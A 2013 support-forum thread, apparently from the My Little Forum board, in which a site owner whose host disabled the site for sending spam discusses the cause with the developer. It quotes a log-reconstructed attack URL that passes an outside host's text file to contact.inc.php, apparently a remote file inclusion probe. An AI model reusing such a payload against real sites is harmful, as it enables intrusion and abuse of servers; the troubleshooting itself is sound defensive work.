Avatar

Site with just MLF is sending out spam and host disabled me. (General)

by Auge ⌂, Thursday, March 28, 2013, 01:15 (4071 days ago) @ MLF User

Hello

Hi, I have a site with nothing but MLF running on it and my site has been disabled due to my site sending out spam. I came to see if there was an updated version and it seems I have the latest version. After searching Google, I cant find a fix (though there are several other exploits out there with this version) and another forum saying their MLF has been disabled due to the script is sending out spam. Has anyone found a fix on how to stop this? Does anyone else know of a threaded forum like this that is more secure?


What is your forum configuration? Who can post in your forum (everyone or registered users)? Did your hoster tell you, wich function was abused (posting form, contact form)?


I had it setup that only registered users could post.
HostGator finally got back with me and told me that MLF is known to be a vulnerable script and that it is not longer maintained by the developers.

I found many exploits for outdated versions but none for MLF 2.3 (maybe there are some reports, but I didn't found them). On the other side, the script is under maintenance, but it's a spare time project of one person and few time to time helpers.

I had a friend look at some things before we shut down the account and he said the same time the spams were going out, the file /includes/contact.inc.php was getting hit by several IP addresses at the same time and the URL it was using was very weird. It was like
http://mydomain.com/includes/contact.inc.php//v//@//@//$admin/@/?http://218.69.248.24/hapy.txt

This isnt the exact URL that was shown in the apache logs but it was a bunch of slashes, @ signs, $admin, and they all ended with that ?http://218.69.248.24/hapy.txt

At the time he found this (the next day), we tried to bring up http://218.69.248.24/hapy.txt but it wouldnt load.

The server under the IP seems to be disabled. The IP 218.69.248.24 is located in China (China Unicom Tianjin province network). That makes it probable that it is a junk bot. I can't imagine a scenario, where a path like contact.inc.php//v//@//@//$admin/@/?http://218.69.248.24/hapy.txt matches. Maybe someone else can tell us something about it.

When only registered members are allowed to post, the contact form is the only open hole for spammers. In many countries you can't disable the contact form due to judical reasons.

I took the path you posted and requested it on Alex's server (replaced mydomain.com with mylittleforum.net/forum/) and got the HTTP status 404 (page not found). Maybe it is "only" a hazard-free DoS (that's not nice for the hoster) and not a successful spam attack (no sended spam mails).

Tschö, Auge

--
Trenne niemals Müll, denn er hat nur eine Silbe!


Complete thread:

 RSS Feed of thread